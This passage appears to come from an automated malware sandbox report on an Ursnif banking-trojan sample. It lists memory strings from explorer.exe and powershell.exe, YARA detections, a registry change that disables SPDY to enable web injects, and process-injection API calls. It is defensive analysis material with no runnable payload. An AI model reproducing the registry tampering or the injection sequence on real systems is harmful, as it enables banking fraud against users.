            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.414828910.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414892314.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.423836026.0000000004BDB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.612829369.000002191303E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.612699598.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.491033572.0000000004170000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414853101.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414912288.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.532328464.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414925514.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414730489.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414774270.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414871579.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.622893274.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.515908651.00000000052D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.610642121.000002DACE3AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.499431243.0000027A6FE50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4456, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1040, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.414828910.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414892314.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.423836026.0000000004BDB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.612829369.000002191303E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.612699598.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.491033572.0000000004170000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414853101.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414912288.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.532328464.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414925514.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414730489.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414774270.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.414871579.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.622893274.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.515908651.00000000052D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.610642121.000002DACE3AE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.499431243.0000027A6FE50000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4456, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1040, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE3830 NtWriteVirtualMemory,28_2_00BE3830
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE387C NtCreateSection,28_2_00BE387C
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BDBAB4 NtAllocateVirtualMemory,28_2_00BDBAB4
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE1AC4 NtQueryInformationProcess,28_2_00BE1AC4
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BDCCA0 NtReadVirtualMemory,28_2_00BDCCA0
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFADD4 NtQueryInformationProcess,28_2_00BFADD4
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BEF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,28_2_00BEF560
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,28_2_00BFF7EC
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BEFFCC NtMapViewOfSection,28_2_00BEFFCC
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,28_2_00BF676C
            Source: C:\Windows\System32\control.exeCode function: 28_2_00C11003 NtProtectVirtualMemory,NtProtectVirtualMemory,28_2_00C11003
            Source: C:\Windows\explorer.exeCode function: 31_2_04DECCA0 NtReadVirtualMemory,31_2_04DECCA0
            Source: C:\Windows\explorer.exeCode function: 31_2_04DFF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,31_2_04DFF560
            Source: C:\Windows\explorer.exeCode function: 31_2_04DFAD14 NtQuerySystemInformation,31_2_04DFAD14
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,31_2_04E0F7EC
            Source: C:\Windows\explorer.exeCode function: 31_2_04DFFFCC NtMapViewOfSection,31_2_04DFFFCC
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,31_2_04E0676C
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF387C NtCreateSection,31_2_04DF387C
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF3830 NtWriteVirtualMemory,31_2_04DF3830
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF1AC4 NtQueryInformationProcess,31_2_04DF1AC4
            Source: C:\Windows\explorer.exeCode function: 31_2_04DEBAB4 NtAllocateVirtualMemory,31_2_04DEBAB4
            Source: C:\Windows\explorer.exeCode function: 31_2_04E21003 NtProtectVirtualMemory,NtProtectVirtualMemory,31_2_04E21003
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFC16428_2_00BFC164
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFA4BC28_2_00BFA4BC
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF676C28_2_00BF676C
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFE08028_2_00BFE080
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF20F828_2_00BF20F8
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BD203C28_2_00BD203C
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF003428_2_00BF0034
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF606428_2_00BF6064
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BEB04028_2_00BEB040
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF91A028_2_00BF91A0
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE913828_2_00BE9138
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BDC13428_2_00BDC134
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE117428_2_00BE1174
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFF94028_2_00BFF940
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF822428_2_00BF8224
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF320828_2_00BF3208
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE938028_2_00BE9380
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BD2BC828_2_00BD2BC8
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BD732028_2_00BD7320
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BD8B5C28_2_00BD8B5C
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE8B4C28_2_00BE8B4C
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF94B828_2_00BF94B8
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE9CB028_2_00BE9CB0
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BED4A828_2_00BED4A8
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BDBCF828_2_00BDBCF8
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE3CE028_2_00BE3CE0
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF74CC28_2_00BF74CC
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE0CC028_2_00BE0CC0
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BDD46028_2_00BDD460
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE1D9428_2_00BE1D94
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE452C28_2_00BE452C
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BEB52028_2_00BEB520
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFB51628_2_00BFB516
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BD6D0828_2_00BD6D08
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BF26B428_2_00BF26B4
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFBEB028_2_00BFBEB0
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BDAE0428_2_00BDAE04
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BD37B828_2_00BD37B8
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BE17B828_2_00BE17B8
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BFAFB828_2_00BFAFB8
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BD9F9828_2_00BD9F98
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BEF77028_2_00BEF770
            Source: C:\Windows\System32\control.exeCode function: 28_2_00BDB75C28_2_00BDB75C
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0A4BC31_2_04E0A4BC
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0AFB831_2_04E0AFB8
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE37B831_2_04DE37B8
            Source: C:\Windows\explorer.exeCode function: 31_2_04DEB75C31_2_04DEB75C
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0676C31_2_04E0676C
            Source: C:\Windows\explorer.exeCode function: 31_2_04DFF77031_2_04DFF770
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0003431_2_04E00034
            Source: C:\Windows\explorer.exeCode function: 31_2_04E091A031_2_04E091A0
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0C16431_2_04E0C164
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF913831_2_04DF9138
            Source: C:\Windows\explorer.exeCode function: 31_2_04DEC13431_2_04DEC134
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF0CC031_2_04DF0CC0
            Source: C:\Windows\explorer.exeCode function: 31_2_04DEBCF831_2_04DEBCF8
            Source: C:\Windows\explorer.exeCode function: 31_2_04E074CC31_2_04E074CC
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF3CE031_2_04DF3CE0
            Source: C:\Windows\explorer.exeCode function: 31_2_04E094B831_2_04E094B8
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF9CB031_2_04DF9CB0
            Source: C:\Windows\explorer.exeCode function: 31_2_04DFD4A831_2_04DFD4A8
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE547431_2_04DE5474
            Source: C:\Windows\explorer.exeCode function: 31_2_04DED46031_2_04DED460
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF1D9431_2_04DF1D94
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE6D0831_2_04DE6D08
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF452C31_2_04DF452C
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0B51631_2_04E0B516
            Source: C:\Windows\explorer.exeCode function: 31_2_04DFB52031_2_04DFB520
            Source: C:\Windows\explorer.exeCode function: 31_2_04E0BEB031_2_04E0BEB0
            Source: C:\Windows\explorer.exeCode function: 31_2_04E026B431_2_04E026B4
            Source: C:\Windows\explorer.exeCode function: 31_2_04DEAE0431_2_04DEAE04
            Source: C:\Windows\explorer.exeCode function: 31_2_04DE9F9831_2_04DE9F98
            Source: C:\Windows\explorer.exeCode function: 31_2_04DF17B831_2_04DF17B8
            Source: C:\Windows\explorer.exeCode function: 31_2_04E020F831_2_04E020F8
